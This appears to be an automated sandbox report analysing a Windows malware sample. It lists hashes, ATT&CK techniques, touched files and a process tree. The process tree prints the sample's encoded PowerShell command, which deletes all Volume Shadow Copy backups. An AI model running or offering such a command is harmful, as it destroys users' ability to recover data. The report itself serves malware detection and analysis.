4478337abc2ec1030756e991d7d4633ad1c99574cba2ee34428cbd67f1e50f18

Analysis

max time kernel
145s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2024 22:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
Size

164KB
MD5

c9c6939cb45bfd22d3b57537839a11ee
SHA1

9ed92175bc2fa9d0e501f9215723a3cf2515b2b0
SHA256

4478337abc2ec1030756e991d7d4633ad1c99574cba2ee34428cbd67f1e50f18
SHA512

ca8ae5c7a96b580aa1b130b543fc82764d09028c0a8ed8ad0a0bb7b0fa891d8f3bdd307868dfb39625af3bbc5818f2d23747d5cc73859df4ecb0443eb4f23dd2
SSDEEP

1536:FYVLroT4ciMeW75jVZF+pWGRjICS4At+GbvF0qcX8opz25maL3SUtNDWyPwop6in:FHixaVZFiOCDJtOicNDWEzZtaobOsB

Score

7^/10

discovery spyware stealer

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\T:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\Z:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\F:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\B:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\Q:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\A:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\E:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\L:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\U:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\H:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\V:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\M:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\S:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\X:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\D:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\K:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\O:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\R:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\W:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\G:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\J:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\N:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\P:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\Y:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened (read-only)	\??\I:	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-lsa-minwin_31bf3856ad364e35_10.0.19041.906_none_25e4da38255df869_sspicli.dll_bcec1809	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-ui-xaml-phone_31bf3856ad364e35_10.0.19041.1023_none_4fd2c5b8998b527f.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-onecore-pnp-umpnpmgr.resources_31bf3856ad364e35_10.0.19041.1_en-us_1bd351c127f6d03f.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-directui-resourcesrs3_31bf3856ad364e35_10.0.19041.1_none_11f4e387011f6d3e.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..eservices.resources_31bf3856ad364e35_10.0.19041.1_es-es_8f13fec659aa866c_wiaservc.dll.mui_54051b53	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-version_31bf3856ad364e35_10.0.19041.546_none_fd4c4081e415c866_version.dll_406ddf44	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_a35d6ad33b0c3e19_bootmgr.exe.mui_c434701f	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasauto-mui.resources_31bf3856ad364e35_10.0.19041.1_it-it_09cd7363afc7ebfa_rasautou.exe.mui_55686a97	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_4c39b2a1b0c21c01_scfilter.sys.mui_cebab716	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wininit_31bf3856ad364e35_10.0.19041.1202_none_a5b2e5b8b986fe3d.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_d88727f57b0f135a.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_428f67dbffd4ce03_axinstui.exe.mui_aea34130	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-branding-engine_31bf3856ad364e35_10.0.19041.1202_none_5e2a05871a9a6485.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.19041.1_es-mx_ff15481bfcd8c4c7.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..se-platform-service_31bf3856ad364e35_10.0.19041.84_none_cc8b03b372325d69.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.19041.546_none_f827f008f8832bd5_rasautou.exe_477abe34	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasbase.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_42d8e7001244e285_kmddsp.tsp.mui_80ddeedb	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..geservice.resources_31bf3856ad364e35_10.0.19041.1_es-es_25a24f5a6fa3eb67_storsvc.dll.mui_2fc7b1d3	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-d..oryservices-ntdsapi_31bf3856ad364e35_10.0.19041.546_none_b72b37b884665d49.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.19041.1288_none_a254f4e433806f5f_gdiplus.dll_423f7010	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_el-gr_a89731d17de81b67.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_10.0.19041.1_de-de_8398f19094835129.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-n..-domain-clients-svc_31bf3856ad364e35_10.0.19041.964_none_21f025fe4ae682b3_fwremotesvr.dll_afaa5ea8	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wininit.resources_31bf3856ad364e35_10.0.19041.1_en-us_fb569e49a9e4cc22.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1_et-ee_0c998c4d8bd40713.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_de-de_c3e98eeb3b8b910b_memtest.efi.mui_71e15c22	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..ient-core.resources_31bf3856ad364e35_10.0.19041.1_es-es_ccff70e5a0c1964c.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-r..intmapper.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_430caa488be6f8ed_rpcepmap.dll.mui_349798e1	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-onecore-pnp-umpnpmgr.resources_31bf3856ad364e35_10.0.19041.1_de-de_72e27bc83918c47a.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-networkbridge_31bf3856ad364e35_10.0.19041.746_none_e5e33ba764e4ddec_bridgeres.dll_55e40455	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_es-es_76fa6c1a5ef15070.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_it-it_03d9d86028f54c50_memtest.exe.mui_77b8cbcc	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-bootvid_31bf3856ad364e35_10.0.19041.1_none_ee6a88fd2591e316_bootvid.dll_c188118d	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-ntasn1-dll_31bf3856ad364e35_10.0.19041.1_none_7024fd8a6432413d.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1023_de-de_157d8b1ac43d0595.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-security-netlogon_31bf3856ad364e35_10.0.19041.1266_none_7cd2351b218c007b.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_b988e3f5244c4507_ncprov.dll.mui_40240de1	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1023_sl-si_a5bc9f2cf9d4120e.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..geservice.resources_31bf3856ad364e35_10.0.19041.1_es-es_25a24f5a6fa3eb67.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmpdui.resources_31bf3856ad364e35_10.0.19041.1_it-it_bc383e9a8755fadf.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-netio-infrastructure_31bf3856ad364e35_10.0.19041.1_none_16e124ab890bcfd5.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-eventlog_31bf3856ad364e35_10.0.19041.1266_none_518a2f9fc80a85ad_wevtsvc.dll_add42ce6	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_10.0.19041.1_none_3500efd1cdfd0fad_svgafix.fon_52683949	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-ntfs_31bf3856ad364e35_10.0.19041.1266_none_1b36fd42d21cefbc.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_cs-cz_33d8c3da77d0026d_memtest.exe.mui_77b8cbcc	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-network-qos-pacer_31bf3856ad364e35_10.0.19041.1_none_ad4e5f294b587440.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-mpr_31bf3856ad364e35_10.0.19041.1_none_63c6d6f5f74ed81c.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..cture-bsp.resources_31bf3856ad364e35_10.0.19041.1_es-es_839da6ed033a36cd_mswsock.dll.mui_d7c2a730	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-win32kbase.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_057ff0e8d689e0d1_win32kbase.sys.mui_07d441e9	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9b6dfbebdc913fa.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_10.0.19041.1_en-us_817a537144a47828.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..geservice.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_c859c559627601c9_storagehealth.adml_00c6b7b3	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9b6dfbebdc913fa_scarddlg.dll.mui_300ae9df	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-usermodensi_31bf3856ad364e35_10.0.19041.610_none_5075d9ce26303c63_nsisvc.dll_7733cdbc	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-user32.resources_31bf3856ad364e35_10.0.19041.1_es-es_f3ba6231caa1b22d.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasbase.resources_31bf3856ad364e35_10.0.19041.1_de-de_6b17c8d06620d760.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_networking-mpssvc-svc.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_6762f0cd5bf0e05a_firewallapi.dll.mui_43c7a05b	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_bc35fcf50d32ba29_userdeviceregistration.ngc.dll.mui_d2c6ca95	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_networking-mpssvc-svc.resources_31bf3856ad364e35_10.0.19041.1_es-es_3d251e9a2dfca3c0.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-shacct-profile_31bf3856ad364e35_10.0.19041.1_none_6a89aed3a259653c.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-p..ne-client-overrides_31bf3856ad364e35_10.0.19041.1052_none_a74b8f64d78e3b2f_power.energyestimationengine.telemetry.ppkg_8b58160d	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-appid.resources_31bf3856ad364e35_10.0.19041.1_en-us_ec1b96874c384b44_appidsvc.dll.mui_6717e231	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_es-es_6ca5c1c82a908e75.manifest	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-eventlog.resources_31bf3856ad364e35_10.0.19041.1_en-us_53f7dd16602c8a90_wevtsvc.dll.mui_f41bf7b7	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4812	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
4812	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeBackupPrivilege	2152	vssvc.exe
Token: SeRestorePrivilege	2152	vssvc.exe
Token: SeAuditPrivilege	2152	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 1356	4812	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe	95
PID 4812 wrote to memory of 1356	4812	c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe	95

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c9c6939cb45bfd22d3b57537839a11ee_JaffaCakes118.exe"
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1356

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3328

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4180,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:8
1⤵
PID:4396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2lefudl.a0o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1356-0-0x00007FFDE8A23000-0x00007FFDE8A25000-memory.dmp

Filesize
8KB

Download
memory/1356-6-0x000001E1FB6A0000-0x000001E1FB6C2000-memory.dmp

Filesize
136KB

Download
memory/1356-11-0x00007FFDE8A20000-0x00007FFDE94E1000-memory.dmp

Filesize
10.8MB

Download
memory/1356-12-0x00007FFDE8A20000-0x00007FFDE94E1000-memory.dmp

Filesize
10.8MB

Download
memory/1356-15-0x00007FFDE8A20000-0x00007FFDE94E1000-memory.dmp

Filesize
10.8MB

Download